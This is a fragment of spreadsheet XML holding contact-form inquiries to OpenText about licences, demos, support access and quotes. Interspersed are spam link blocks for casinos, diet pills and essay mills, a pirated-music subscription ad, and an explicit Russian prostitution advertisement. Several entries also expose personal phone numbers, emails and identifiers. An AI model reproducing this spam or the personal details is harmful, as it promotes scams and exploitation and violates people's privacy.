[url=http://casinoline17.com/]casino games free[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>4-8021 Architecting Documentum Applications v7.2 _x000D_
I need to know what Virtual Class means, is it via some online session? be cause the information is contradictory.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OPENTEXT_x000D_
We are writing to you in order to get some information which will help us to reach some of our objectives. We are a local NGO located in the West of Africa; Ghana precisely in Accra and working on NGOs database. We would very much like to get a grant from OPENTEXT but we do not know how to apply to it. Could you please advise us on procedures we have to follow._x000D_
Thank You_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
_x000D_
We are looking for an online platform that allows us to exchange digital documents with different external parties._x000D_
The types of documents to be exchanged, are made with specific software (e.g. : autocad, BIM, E-plan, …)_x000D_
_x000D_
_x000D_
The aim is to centrally manage the information of different contractors and to ensure that the various parties can always use the latest version of a specific document. _x000D_
As a administrator of the platform, we manage the platform and determine the document structure, but the various (external and internal) parties must have access to the platform in order to be able to place documents on them or documents that fit on them. The necessary information must be kept in order to be able to do version management. _x000D_
_x000D_
	At least we want to be able to register who, when changes have been made._x000D_
	In addition to document modification, the ability to approve documents must also be available. Certain approval flows need to be linked to documents and there must be a clear insight of whom an action is expected, while going through this approval flow._x000D_
	The system should have the necessary visualisations to show clearly per person his projects and to which projects he has access. When possible, we prefer a single access portal. An added value would be that if a third party uses the same platform it is also accessible via that one access portal._x000D_
	Most of the time it will be used for large files (AutoCAD, Eplan, BIM, etc.) and those should be accessible with sufficient speed._x000D_
	The system must have the necessary security precautions to prevent that it other non-authorised parties gain access to the data._x000D_
	Given that it concerns several projects, it is necessary that sufficient space is available on the platform. A first estimate is that a storage space of 25 GB should be available. This storage space must be able to be distributed flexibly over the various projects and, if necessary, space can easily be expanded._x000D_
	The necessary support should </t>
  </si>
  <si>
    <t>new weight loss medication _x000D_
[url=http://regimenforfeit.com/]best diet pill[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;gnc diet pills that really work&lt;/a&gt; _x000D_
diet pill</t>
  </si>
  <si>
    <t>new usa online casinos 2017 _x000D_
[url=http://casinoline17.com/]play casinos[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;free online casino&lt;/a&gt; _x000D_
casino games roulette</t>
  </si>
  <si>
    <t>slimming pills _x000D_
[url=http://regimenforfeit.com/]weight loss supplements for women[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;2017 best weight loss pills&lt;/a&gt; _x000D_
diet supplements that work</t>
  </si>
  <si>
    <t>weight loss medications prescription _x000D_
[url=http://regimenforfeit.com/]appetite suppressant[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;new weight loss medication&lt;/a&gt; _x000D_
best new prescription diet pills</t>
  </si>
  <si>
    <t>online casino no deposit bonus _x000D_
[url=http://casinoline17.com/]free real money casino no deposit[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;cassino&lt;/a&gt; _x000D_
online gambling sites for real money</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon!_x000D_
We use the program Brava!Reader. On Your website we see _x000D_
Note: Please be aware that support for PDF and image formats will be discontinued in the next release of Brava! Reader. Please explain in the next release we will not be able to view images in PDF format and other image?_x000D_
Many Thanks!_x000D_
</t>
  </si>
  <si>
    <t>http://0daymusic.org _x000D_
 _x000D_
Private FTP Music/Albums/mp3 1990-2018: _x000D_
Plan A: 20 EUR - 200GB - 30 Days _x000D_
Plan B: 45 EUR - 600GB - 90 Days _x000D_
Plan C: 80 EUR - 1500GB - 180 Days</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://casinoline17.com/]kasino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;play casino games online&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t>Hello,_x000D_
i am trying to download documentun however i can't find any file to download, can you provide me with the link containing exe file please ?_x000D_
thank you,</t>
  </si>
  <si>
    <t>Registration Conference Form for Vladas Leonas just submitted - please update Mobile Phone Number to 0419 239 856</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinoline17.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino online&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>Unexpected EDI XPO is receiving from Inovis</t>
  </si>
  <si>
    <t>free casino games and poker _x000D_
[url=http://casinoline17.com/]best online casino games free[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;best online casino games free&lt;/a&gt; _x000D_
aol games free casino</t>
  </si>
  <si>
    <t>You site job search is not working.</t>
  </si>
  <si>
    <t>pogo casino slots _x000D_
[url=http://casinoline17.com/]casino online loc us[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;best online casino games free&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t xml:space="preserve">I'm fascinated. I do not think I've met anyone who understands so much about the topic. You should make a career of it, seriously, amazing blog _x000D_
http://www.hamizihamdan.com/how-online-writing-services-aid-students-72/_x000D_
http://www.schoolam.com/help-me-do-admission-application-essay/essay-writing-self-crafting-and-online-essay-83/_x000D_
http://swaggsmarket.com/2016/10/the-positive-aspects-of-over-the-internet-essay-60/_x000D_
http://www.thorhushovd.net/the-transformation-of-web-college-paper-writing/_x000D_
http://www.bzpb.ru/Р±РµР·-СЂСѓР±СЂРёРєРё/trusted-essay-writing-service-presentations-are-3/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Many thanks for the blog, it is packed with so much helpful information. This . _x000D_
https://thepdaiviet.com/2016/10/21/essay-writing-self-creating-and-online-essay-77/_x000D_
http://www.omeryounas.com/the-transformation-of-on-the-net-writing-providers-2/_x000D_
http://www.pacificsunalpacas.com/optimum-article-writings-service-for-your-studying-5/_x000D_
http://romuline.eu/our-custom-writing-service-has-all-that-you-just-14/_x000D_
https://www.just-desserts.co.uk/powerpoint-presentations-will-definitely-25/_x000D_
</t>
  </si>
  <si>
    <t>Our company is an TI VAR. Our LA County customer is RFQ for your products. Please let me know if we can get a quote from you or direct us to the disti.</t>
  </si>
  <si>
    <t>new usa online casinos 2017 _x000D_
[url=http://casinoline17.com/]casinos online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino online loc us&lt;/a&gt; _x000D_
aol games free casino</t>
  </si>
  <si>
    <t>email address for Massy Technologies InfoCom (Trinidad) Ltd is stated incorrectly.  the correct address is:   marketing.infocom@massytechnologies.com_x000D_
please update this info</t>
  </si>
  <si>
    <t>As part of client requirement doing analyzing suitable BPM Tool. With my past experience on MBPM, i would like to create few forms and show to customer if we are ok to use MBPM. Requesting you please provide evaluation version download to start creating application.</t>
  </si>
  <si>
    <t>I can't get into area to Download latest version of liquid office software.</t>
  </si>
  <si>
    <t>I am evaluating solutions for a supplier portal.  Specifically interested in tools that would allow us to import various documents into SAP.  For example, I would like a way to scan Certificate of Analysis forms and have the data populate into the inspection record.  Another example is that we want to use a form or email to automate delivery dates on purchase orders in SAP.  Illumina currently uses VIM.</t>
  </si>
  <si>
    <t xml:space="preserve">I wnat to know the price of licenses for Brava in order to have a tool to read all drawing files and make red lines over them. I am needing this tool for 20 users._x000D_
</t>
  </si>
  <si>
    <t>I need a quote to export data from DocView. We already are using DocView and I'm not sure who is our account manager. Can someone please contact me regarding this.</t>
  </si>
  <si>
    <t>Your corporate responsibility commitment is interesting so I'm reaching out. As a nonprofit dedicated to finding, training, and nurturing foster parents throughout Utah our biggest need is finding companies, groups, and individuals that will help us strengthen community awareness about the work we do, and about children in foster care. We offer a one-hour educational tour of our mission for groups of 10 to 20 interested in learning more. Call the office line (above) or my cell at 801 550 7785 to connect and discuss more. Thanks, Julie</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for a really wonderful blog. It was actually very helpful. I'm so happy I discovered this. _x000D_
http://weknowgear.com/actually-buy-personalized-essays-and-have-out-of/_x000D_
http://dronleszno.pl/the-kinds-of-essays-which-you-can-order-from-2/_x000D_
https://www.just-desserts.co.uk/authority-essay-writing-provider-is-your-3/_x000D_
http://www.iptv-maroc.com/2016/03/27/using-the-net-writing-companies-relieve-accuracy/_x000D_
http://www.womanorium.com/womenshealth/on-the-net-college-paper-writing-products-and-2/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I've seen something very similar in a different thread. You can definitely find certain parts of that article useful, not everything obviously, but I think it is worth checking out. _x000D_
http://adbvernier.fr/what-s-much-better-essay-writing-by-yourself-or-32/_x000D_
http://princeenglishsolution.com/knowing-about-the-benefits-of-on-line-essay-3/_x000D_
http://www.schulung-medizin.de/availing-the-benefits-of-on-line-writing-services-6/_x000D_
http://www.recruitmentjunction.com/using-the-web-writing-providers-simplicity-3/_x000D_
http://jav.ratedxhost.com/?p=7534_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Many thanks for sharing with us, I always find out something new from your posts. _x000D_
http://www.tabboy.be/how-are-you-able-to-buy-college-essay-papers-here-11/_x000D_
https://aplikacja.aquamapa.com/?p=1208_x000D_
http://www.ncsolicitors.com/have-troubles-then-buy-college-essay-papers-15/_x000D_
http://nicelycleanauto.com/2016/07/05/how-you-can-create-an-impressive-admission-essay-5/_x000D_
http://miamiseafoodrestaurant.com/2016/11/06/the-different-types-of-essays-that-over-the-25/_x000D_
</t>
  </si>
  <si>
    <t>Request for quotation for the US Housing and Urban Development</t>
  </si>
  <si>
    <t xml:space="preserve">I enjoy all your posts. You've done really good job _x000D_
http://www.chicagobluesguitar.com/the-categories-of-essays-which-you-could-pay-for-2/_x000D_
http://www.bene-vit.de/essay-writing-person-creating-and-online-essay-81/_x000D_
http://yourfamilyshandyman.com/2016/07/by-going-online-producing-companies-relieve-2/_x000D_
http://www.nitindani.com/2016/03/information-on-admission-essay-6.html_x000D_
http://www.sevenchanger.com/the-differing-types-of-essays-that-on-line-essay-9/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I registered and paid yesterday but am not able to access this event as  registered </t>
  </si>
  <si>
    <t>kirillignat1996@mail.ru</t>
  </si>
  <si>
    <t>Новости компьютерного мира тут [url=http://alvarvas.com/]alvarvas.com[/url]</t>
  </si>
  <si>
    <t>I signed up for your conference in July but did not print out a receipt .  Can you please e-mail me a receipt.</t>
  </si>
  <si>
    <t>Evaluating new VAN and AS2 solution.</t>
  </si>
  <si>
    <t xml:space="preserve">A short while ago I have come across one post which I believe you might find helpful. Someone might take a steaming dump all over it, however it answered some of my questions. _x000D_
http://newjordans.us/?p=9555_x000D_
http://apimicon.eu/most-effective-article-writings-service-for-the-3/_x000D_
http://centroestudiosfiscales.com/admission-software-and-educational-essays-176/_x000D_
https://www.85apparel.com/2016/05/21/essays-and-powerpoint-the-most-extensively-11/_x000D_
http://www.massinel.com/?p=13718_x000D_
</t>
  </si>
  <si>
    <t>Please provide a quote for TWO licenses for OpenText Exceed OnDemand.</t>
  </si>
  <si>
    <t>I requested the download of the CCM Forrestr Wave from the web site._x000D_
The link recieved vie email did not work._x000D_
Can you please send me the correct link?_x000D_
Thanks_x000D_
A.I.</t>
  </si>
  <si>
    <t>Need assistance with my HRAS login.  I am unable to connect and believe I might require a new password.</t>
  </si>
  <si>
    <t xml:space="preserve">Awesome! This may be by far the most useful thing on the matter I've ever come across. Thank you for your work. _x000D_
http://www.sydneydeckingcompany.com.au/essay-writing-person-writing-and-online-essay-3/_x000D_
http://allamericanbulls.com/help-me-do-admission-application-essay/the-transformation-of-using-the-web-creating-9/_x000D_
http://www.fisiopower.it/paper-writing-service-in-canada-presentations-will-29/_x000D_
https://mastertimetravel.com/effortless-methods-for-all-your-writing/_x000D_
https://ambametal.in/being-aware-of-regarding-the-advantages-of-via-the-4/_x000D_
</t>
  </si>
  <si>
    <t>I would like to get in touch with your AP department to resolve a check that was returned via Wells Fargo._x000D_
Check number  11967166 _x000D_
Thank You</t>
  </si>
  <si>
    <t xml:space="preserve">I am running for Roche an evaluation of tools for extracting text from handwritten documents. I would like to evaluate different solutions for ICR - Intelligent Character Recognition - and your company is offering one._x000D_
_x000D_
How can I test your solution for ICR on a few sample documents?_x000D_
Can you grant me limited access to the API for evaluation purposes?_x000D_
_x000D_
If not, what are any other options to test the solution?_x000D_
</t>
  </si>
  <si>
    <t>Interested in pay as you go EDI solution for business with Costco.</t>
  </si>
  <si>
    <t>I need to speak to someone to discuss our VAN requirements going forward.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext -_x000D_
_x000D_
If you are looking to build your pipeline with new prospects the CFO Forums can help you pre-schedule up to 18 meetings in one day with attendees that have a specific need for the products and services your company provides.  _x000D_
_x000D_
Our all-inclusive packages include meals, refreshments, full access to attendee profiles, keynote address access, cocktail reception, full meeting area set-up, including power, signage, internet table and chairs.  _x000D_
_x000D_
May 3, The Harvard Club, New York City_x000D_
2018 Confirmed to date: http://www.thecfo-forum.com/confirmedlists/e/CFO/y/2018/p/45773_x000D_
_x000D_
June 14, The Ritz Carlton Downtown, San Francisco_x000D_
2018 Confirmed to date: http://www.thecfo-forum.com/confirmedlists/e/CFC/y/2018/p/0b4b3_x000D_
 _x000D_
Discounted places are limited and on a first come first serve basis, reply to this email today to set up a quick call to discuss availability. _x000D_
_x000D_
Thank you and looking forward to working together._x000D_
_x000D_
Regards,_x000D_
Nick _x000D_
</t>
  </si>
  <si>
    <t>Vor einigen Jahren haben wir über die Firma HWF in Köln 10 Lizenzen für die Gupta Entwicklungsumgebung Team Developer 6 erworben. Der Ansprechpartner war Herr Matthias Seipel. Leider sind die Aktivierungscodes nicht mehr vollständig verfügbar. Bitte senden Sie uns diese erneut zu.</t>
  </si>
  <si>
    <t>How do I upgrade to the current Brava desktop build 16.3?</t>
  </si>
  <si>
    <t>Trying to get a hold of my sales rep. Is it still Ted Fish?</t>
  </si>
  <si>
    <t>Hallo, _x000D_
_x000D_
wir haben Interesse die "OpenText Suite for SAP" in unserem Unternehmen einzuführen und zu nutzen. Daher würden wir gerne mit Ihnen in Kontakt treten und Ihnen unsere Ausschreibung hierfür zukommen lassen. An welche E-Mail Adresse und Kontaktperson in Deutschland können wir uns wenden?_x000D_
_x000D_
Vielen Dank und freundlichen Gruß_x000D_
_x000D_
Ingo Jansen</t>
  </si>
  <si>
    <t>Require information about the Avelon mobile approval portal.  I'm not clear if this is the same as the standard Opentext VIM mobile approval portal.  We are evaluating this, so I'd appreciate if you can contact me to discuss</t>
  </si>
  <si>
    <t xml:space="preserve">Som jag förstått det är Guidance Software numer ägt av er (Opentext) och jag skulle vilja komma i kontakt med någon hos er som kan hjälpa mig med frågor rörande Guidance Software produkter. _x000D_
_x000D_
Tack på förhand! </t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
this inquiry on behalf our customer needs they wants to buy a product called Open text Exstream for there project. and share the quotation for the Product. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I am interested in an automated redaction tool that will redact PII from a documents within a specific part of a document management system (DMS). I came across Redact-It and am interested to learn if it could help with this project._x000D_
_x000D_
For context, the file types in the DMS are generally Word, PPT, PDF and emails. PII is unlikely to be held in the metadata of the item, so for the most part, full text is the focus. Some (older) pdf docs are scans of hard copy content and may not be OCR'd. _x000D_
_x000D_
Is Redact-It a stand-alone solution or can it integrate in place with a DMS? What format is the Redact-It redacted output and is the output searchable?_x000D_
_x000D_
Kind regards,_x000D_
Celine_x000D_
</t>
  </si>
  <si>
    <t>Access to create a ticket</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Supplier,_x000D_
You may be aware that, as of the 1st April 2017, Hewlett Packard Enterprise’s Services business was spun off and merged with CSC to form our new company, DXC Technology. _x000D_
DXC remain are obliged, under ISO 27001, to demonstrate that we have confidence in the Cyber integrity of our supply chain partners, and we fulfil this obligation by requesting that our suppliers complete an annual information security assessment on the HMG SiD4Gov platform._x000D_
OPEN TEXT are listed as a major supplier to DXC UKPS accounts and have regularly invoiced for services delivered in FY18, I am therefore seeking a contact within your organisation who may be able to help us by completing an on line assessment during our next campaign which is due to be launched in early 2018.  _x000D_
Completion of the assessment is an integral element of our due diligence processes and ensures suppliers remain eligible to appear on our preferred supplier list, so I would ask that you respond as soon as you are able so I can include your organisation in the next available campaign._x000D_
WE have been unable to establish if our previous contact (katkinson@opentext.com) remains in post, and therefore seek someone in similar role with whom to discuss this matter._x000D_
Please advise_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
We are an IT company, with software products and consultancy focusing on banks, insurance companies and other financial companies. We are located mainly in Finland, but we have offices also in Tallinn and now in Sweden. We have some customers that are using StreamServe for the communication and reporting to customers and they would need some consultancy help from us. What would be the best way to start training our consultants to your products? Could we have some training material and/or demo version of your product or what would you recommend?_x000D_
Best regards,_x000D_
Marko Krappe_x000D_
Country Manager_x000D_
+358 40 531 9117_x000D_
+46 76-045 22 76_x000D_
Profit Software Ab _x000D_
C/O Convendum, Vasagatan 16, 111 20 Stockholm, Sweden_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Please can you arrange a demo of Document Control / Management system for Engineering / Drawings please?</t>
  </si>
  <si>
    <t xml:space="preserve">Full name of the software – Open text Exstream_x000D_
•             Qty required - 17_x000D_
•             Soft link which has the product details_x000D_
                                  https://www.opentext.com/what-we-do/products/customer-experience-management/customer-communications-management/opentext-exstream_x000D_
Full name of the software – Open text Exstream_x000D_
•             Qty required - 17_x000D_
•             Soft link which has the product details_x000D_
                                  https://www.opentext.com/what-we-do/products/customer-experience-management/customer-communications-management/opentext-exstream_x000D_
_x000D_
Full name of the software – Open text Exstream_x000D_
•             Qty required - 17_x000D_
•             Soft link which has the product details_x000D_
                                  https://www.opentext.com/what-we-do/products/customer-experience-management/customer-communications-management/opentext-exstream_x000D_
_x000D_
Open text Exstream- qty - 17 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Many thanks for helping people get the information they need. Great stuff as always. Keep up the good work!!! _x000D_
http://www.hunantravelguide.com/attempt-to-buy-essays-online-and-also-you-wont-6.html_x000D_
http://frejm.sk/exactly-where-to-write-custom-essays-perfectly-7/_x000D_
http://motibluechip.com/2016/08/25/essays-and-powerpoint-probably-the-most/_x000D_
http://allisonlives.com/the-kinds-of-essays-that-you-can-invest-in-from-on/_x000D_
http://sullivansflorist.co.uk/2016/09/04/invest-in-customized-essays-and-acquire-out-of-the/_x000D_
</t>
  </si>
  <si>
    <t>I need a protection order and I need assistance with FINCEN re tdf90221 1120ric 104156 1065 REIT  metal run 51-6566899 thank you Teresa Bussey trustee fudiciary</t>
  </si>
  <si>
    <t xml:space="preserve">Coordinating a full schedule of forensic courses for my Lab team. </t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to understand how to purchase xPression suite license in OpenText, who should I contact for detail, like what's the cost? And when I can get it. Thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">This is my very first time visiting your blog and I am very interested. Thank you for sharing and keep up ;) _x000D_
http://horwood.paullavelle.com/articles-essay-services-right-excellent-for-your/_x000D_
http://rewardinsurance.com.au/the-kinds-of-essays-which-you-could-procure-from-2/_x000D_
http://oasat.com/2016/09/21/pay-for-custom-made-essays-and-have-away-from-the/_x000D_
http://laoschool.net/?p=1970_x000D_
http://vvvv.tokobambino.com/web-producing-services-ease-accuracy-and-many/_x000D_
</t>
  </si>
  <si>
    <t>I want to create a ticket for a license request</t>
  </si>
  <si>
    <t>HI ,_x000D_
_x000D_
We would like to know the end of life for the product Open text exstream 9.0.107 _x000D_
_x000D_
Thanks _x000D_
Shayiq</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I am looking for documentum download and access to the support site. We had it on emc but after migration we lost. can you grant access?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I am trying to Find out Details on an a software application called Alchemy Search and if it is still available to purchase and how databases can be exported without Email or printer access to use on another machine.  </t>
  </si>
  <si>
    <t xml:space="preserve">It's an amazing article. This website has lots of useful things, it really helped me in many ways. _x000D_
https://tee-meng.com/simple-methods-to-create-an-spectacular-admission-6/_x000D_
http://cekarinsaat.net/the-different-sorts-of-essays-that-via-the-4/_x000D_
http://cranberrykiss.com/admission-application-and-tutorial-essays-40/_x000D_
http://www.iabj.net/our-major-essay-writing-service-8/_x000D_
http://www.elitt.fr/?p=8472_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I like all your posts. You have done great job _x000D_
http://j72011.cumbresblogs.com/2017/03/07/cheap-educational-papers-creating/_x000D_
http://www.kuberjewel.com/order-tailor-made-essays-and-have-out-of-the-2/_x000D_
http://rodbizconsulting.com/what-is-better-essay-writing-by-your-self-or-15/_x000D_
http://trendblend.pl/help-me-do-admission-application-essay/powerpoint-presentations-will-generally-function-2/_x000D_
http://outlawbrewing.co.uk/sensible-techniques-for-creating-the-right-essay/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I browsed through this site and you've got so much handy information, saved to my bookmarks _x000D_
http://www.tutorialesenvideo.net/via-the-web-creating-services-ease-accuracy-and/_x000D_
http://www.enkirama.fr/?p=16139_x000D_
http://www.arkaeducation.com/2016/08/pro-essay-composing-assistance-is-your-preserving/_x000D_
http://cafebaharhyderabad.com/cheap-papers-writing-service-12/_x000D_
http://www.finanskredi365.com/the-different-types-of-essays-that-via-internet-8/_x000D_
</t>
  </si>
  <si>
    <t>Interested in upgrading our DAM</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for your awesome blog. It was very useful. I am just so happy I discovered this. _x000D_
http://interbarriales.eluniverso.com/2016/11/22/how-online-writing-services-guide-students-182/_x000D_
http://www.radiotele.com.mx/a-manual-on-admission-essay-19/_x000D_
http://vperacto.com/that-are-professional-essay-writers-8/_x000D_
http://hometowntowing.biz/the-different-sorts-of-essays-that-on-the-web-24/_x000D_
http://blog.funnydomainnames.com/2016/12/10/powerpoint-presentations-can-normally-operate-for/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I'm Amiya. I have really enjoyed reading Open Text. _x000D_
I'm the Channel Editor at ETF Trends (www.etftrends.com) and we are launching a robotics and artificial intelligence channel next week._x000D_
 We are looking to add one or two new contributors to feature on our site and would love to feature your work._x000D_
Would you be okay with us republishing some of your articles on our site?_x000D_
In return, we'll create an author bio page with links to your website and social media accounts. We'll also link back to the original piece in each article we republish._x000D_
Please let me know if you have any questions. I'd be happy to jump on a quick call._x000D_
Best,_x000D_
Amiya Moretta _x000D_
Channel Editor_x000D_
2010 Main Street, Suite 1170 | Irvine, CA 92614_x000D_
(t) 949.794.0070 | (f) 949.794.0075_x000D_
ETFtrends.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I've seen something similar in some other thread. You will probably find some parts of that article helpful, not everything obviously, but I think it is worth checking out. _x000D_
http://www.bitan-group.com/?p=1358_x000D_
http://miamiseafoodrestaurant.com/2016/12/11/value-of-online-writing-services-to-assist-the-20/_x000D_
http://www.progettocresco.it/tips-on-how-to-create-an-amazing-lab-report/_x000D_
http://rayaptikuskecoa.com/the-transformation-of-on-line-composing-services/_x000D_
http://enklawapokoje.pl/tips-on-admission-essay-73/_x000D_
</t>
  </si>
  <si>
    <t>Hi , for some reason I cant login to the knowledge center anymore, please provide access again . Thanks, Gertjan Blom</t>
  </si>
  <si>
    <t>need to purchase licenses as soon as possible</t>
  </si>
  <si>
    <t>http://whore.msk.ru/page/ebut-dvuh-shlyuh/ _x000D_
Такие феи Саратова, просто настоящий подарок для шикарного секса, приглашения на проститутки саратова и саратовской области.  Все девушки огромный выбор проституток и индивидуалок.  Саратова проститутки саратова от недорогих до экстра-класса.  Уважаемый посетитель! Страницы сайта могут содержать изображения и самые лучшие индивидуалки саратова.  Проститутки Саратова на Saratov-X проститутки саратова доставят лучшее наслаждение в саратове, общение с индивидуалкой. com - Индивидуалки шлюхи города Саратов Проститутки, Шлюхи, Бляди Саратова:Я хоть и пышненькая, но могу заняться сексом в любой позе элитные проститутки саратова знают, что стеснение для молодых людей – это не редкость.  юбку из шифона сшить быстро проститутки саратов, индивидуалки саратова, секс саратов, шлюхи саратов, интим саратов.  ПорноЖаба - никаких ограничений возраст, лет: 22 рост, см: 168 вес, кг: 50 бюст, размер: 2: 1 час: 5000 2 часа: 10000 ночь: 25000 : основные.  Самые жесткие фото шлюхи в челнах- шлюхи кстово- бляди саратова.  Всё таки женская мастурбация онлайн, ни когда не надоест катаясь на кучах она разливается в голоса и.  Посмотрите на эту красивую сучку проститутки саратова доставят несравненное расслабление и отличный отдых.  Все шлюхи Саратова уникальны, неповторимы и запоминающиеся на нашем сайте.  Перечень услуг индивидуалки и дешевые проститутки саратова.  Лучший отдых предоставят Вам именно проститутки Саратова недорогие девочки по вызову в саратове для.  Самые изысканные и тайные проститутки саратова - индивидуалки.  Телочки Саратова   это настоящие профессионалы, которые знают все способы ублажения мы рады приветствовать вас на сайте интим знакомств.  Индивидуалки Саратова будут рады пригласить к себе успешных и состоятельных мужчин проститутки саратова, индивидуалки, транссексуалы, мужчины по вызову размещают здесь свои.  проститутки саратова, 18 лет шлюхи саратова, 18 лет.  Чтобы не задумываться над сценарием интимной встречи неслож</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to set up an ECM demo.  We are the office of investments at Columbia University and are looking for a system to manage our documents, workflows, and retrieval of information.   </t>
  </si>
  <si>
    <t>https://otc.saas.nstein.net   Vulnerable!!!!_x000D_
You can communicate to the web administrator. admin_x000D_
https://twitter.com/Y4r4G_</t>
  </si>
  <si>
    <t xml:space="preserve">It is my first time visiting your blog and I'm very fascinated. Thanks for sharing and keep up ;) _x000D_
http://belkpark.com/admission-application-and-academic-essays-62/_x000D_
http://www.thefilm.fr/articles-essay-services-preferred-high-quality-for-2/_x000D_
https://zlatnictvo.sk/essay-writing-personal-writing-and-online-essay-71/_x000D_
http://sss333.ru/СЂР°Р·РЅРѕРµ/realizing-in-regards-to-the-advantages-of-on-the-14_x000D_
http://www.e-tarifler.tv/one-of-the-best-resolution-for-your-education-2/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiring about upgrading our existing licenses for Exceed 14 with Secure Shell add on to Exceed 15. </t>
  </si>
  <si>
    <t>Can you please confirm the email address' that are receiving the faxes that come through? can we edit this list?</t>
  </si>
  <si>
    <t>Hi, I'm a previous employee and I'm looking for old T4 slips. Could someone from HR please contact me to provide a copy of the slips._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>We'd like to request demo of Open Text content suite (cloud) as soon as possible!</t>
  </si>
  <si>
    <t>I would like to receive a quote for a basic enterprise content management solution to use for preparing a grant application. If approved I would be purchasing through the State of Washington master contract.</t>
  </si>
  <si>
    <t>adding (2) more ReDACT license</t>
  </si>
  <si>
    <t>I am the technical lead for the DMS application in PwC and we are using Documentum for last 15 yrs atleast.We are currently using webtop 6.8.1 and looking for options to improve user experience.I was reading about LEAP and products of LEAP.How is leap integrated with Documentum?I will need more information so I can understand and make appropriate decisions.</t>
  </si>
  <si>
    <t>need to add a new GS1 prefix to our account. I do not see where I can do this online. please advise so I can add our Products. thank you</t>
  </si>
  <si>
    <t>I am or was a Stock holder in COVISINT. I went on the Internet to find how my investment was and not successful.  Detective work I found that the company was sold to OpenText. Could you supply me with some incite as to, if I'm a Stock holder in OpenText thanks??</t>
  </si>
  <si>
    <t xml:space="preserve">For Open text VIM training and certification enquiry. Please suggest._x000D_
I am currently in India and working for a multinational company in SAP from the past 10 years. </t>
  </si>
  <si>
    <t>Looking to met folks in your legal department</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for sharing with us, I always find out interesting things from your posts. _x000D_
http://theharmonyvinhomes.net/acceptable-remedies-for-all-your-creating-needs/_x000D_
</t>
  </si>
  <si>
    <t>Knowledge Management system</t>
  </si>
  <si>
    <t>Hi Support,_x000D_
_x000D_
can you please send me install guide for DM Server 16._x000D_
_x000D_
Thank you,_x000D_
George</t>
  </si>
  <si>
    <t>Want to consolidate documents in a searchable method.</t>
  </si>
  <si>
    <t xml:space="preserve">It is my first time visiting your blog and I'm very interested. Many thanks for sharing and keep up ;) _x000D_
http://theharmonyvinhomes.net/acceptable-remedies-for-all-your-creating-needs/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello My name is Bobby Ward, I still have Yousendit/hightail stock from when I worked there. I would like to know what this means for the stock I have.  you can reach me at 510-827-9512. </t>
  </si>
  <si>
    <t xml:space="preserve">Since I have been migrated to Windows 10 I cannot access https://support.opentext.com any more. I already reset my password´and removed all stored credentials from Windows 10 Credential Manager; this did not help. OT IT Helpdesk does not respond to the topic. Therefore pls. advise how I can regain access to https://support.opentext.com _x000D_
Thanks in advance! _x000D_
Thomas </t>
  </si>
  <si>
    <t>Reset password and resetting/updating our email default, not sure where the recover password email would get sent. Would need to change it to EDIAdmins@tommybahama.com.</t>
  </si>
  <si>
    <t>Dear Sir or Madam_x000D_
_x000D_
I have come across the website of Opentext while looking for a reliable company providing services which would be of interest for the members of our global alliance, GGI Geneva Group International (www.ggi.com). We are currently looking forward to expanding our international partnerships, therefore I would appreciate if you could forward this message to your company's Marketing Manager in order to review our proposal. _x000D_
_x000D_
GGI is the leading global alliance of professional and independent accounting, law and consulting firms. Based in Switzerland, we have over 570 member firms with 770 offices in 123 countries, generating an annual cumulated fee income of USD 5,245 billion and counting more than 27'000 full-time employees._x000D_
_x000D_
As I mentioned, I believe that your services would be of great interest for our members, would you be open to discussing further about potential cooperation opportunities between our companies? In the meantime, I have attached our presentation and our latest rankings for your reference._x000D_
_x000D_
I certainly remain at your disposal should you require further information and I am looking forward to hearing from you._x000D_
_x000D_
Yours faithfully,_x000D_
_x000D_
Marco Izzo</t>
  </si>
  <si>
    <t>Dear team,_x000D_
